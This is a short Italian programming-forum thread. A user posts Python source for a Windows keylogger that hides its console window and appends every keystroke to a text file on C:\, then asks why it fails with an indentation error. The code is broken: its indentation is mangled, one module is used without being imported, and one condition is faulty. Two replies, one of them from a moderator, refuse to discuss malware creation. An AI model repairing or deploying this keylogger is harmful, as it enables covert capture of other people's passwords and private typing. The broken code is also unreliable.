Visualizzazione dei risultati da 1 a 3 su 3
  1. #1
    Utente di HTML.it L'avatar di Sym98
    Registrato dal
    Feb 2010
    Messaggi
    54

    [Python] Keylogger software

    Ciao a tutti, mi sto cimentando nella creazione di un Keylogger che salvi gli input della tastiera in un file di testo situato in C:\ utilizzando Python...
    I codici che inserisco su PythonWin sono i seguenti:

    CODE:

    import win32gui
    import os
    import pythoncom, pyHook

    win = win32console.GetConsoleWindow()
    win32gui.ShowWindow(win,0)

    def OnKeyboardEvent(event):



    if event.Ascii==5:




    _exit(1)




    if event.Ascii != 0 or 8:



    f=open('c:\output.txt','r')



    buffer=f.read()



    f.close()



    f=open('c:\output.txt','w')



    keylogs=chr(event.Ascii)



    if event.Ascii==13:



    keylogs='/n'



    buffer += keylogs



    f.write(buffer)



    f.close()

    if os.path.isfile('c:\output.txt') == False:
    f=open('c:\output.txt','w')
    f.close()

    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()

    Quando lo apro non fa nulla, compare solo una finestra per meno di un secondo e poi scompare, ho salvato il file in C:\ come "logger.py"...
    Ho provato ad aprirlo dal prompt dei comandi, ma riscontra un errore:

    C:\>logger.py
    File "C:\logger.py", line 13
    if event.Ascii==5:
    ^
    IndentationError: expected an indented block (Previsto un blocco indentato)

    Mi aiutate?? Grazie anticipamente..=D

  2. #2
    Utente di HTML.it L'avatar di oregon
    Registrato dal
    Jul 2005
    residenza
    Roma
    Messaggi
    36,466
    Guarda che la discussione di questo tipo di programmi, potenzialmente "malware", non sono ben visti in questo forum ...
    No MP tecnici (non rispondo nemmeno!), usa il forum.

  3. #3
    Moderatore di Programmazione L'avatar di alka
    Registrato dal
    Oct 2001
    residenza
    Reggio Emilia
    Messaggi
    24,311

    Moderazione

    Qui non si parla della creazione di generico malware.
    MARCO BREVEGLIERI
    Software and Web Developer, Teacher and Consultant

    Home | Blog | Delphi Podcast | Twitch | Altro...

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.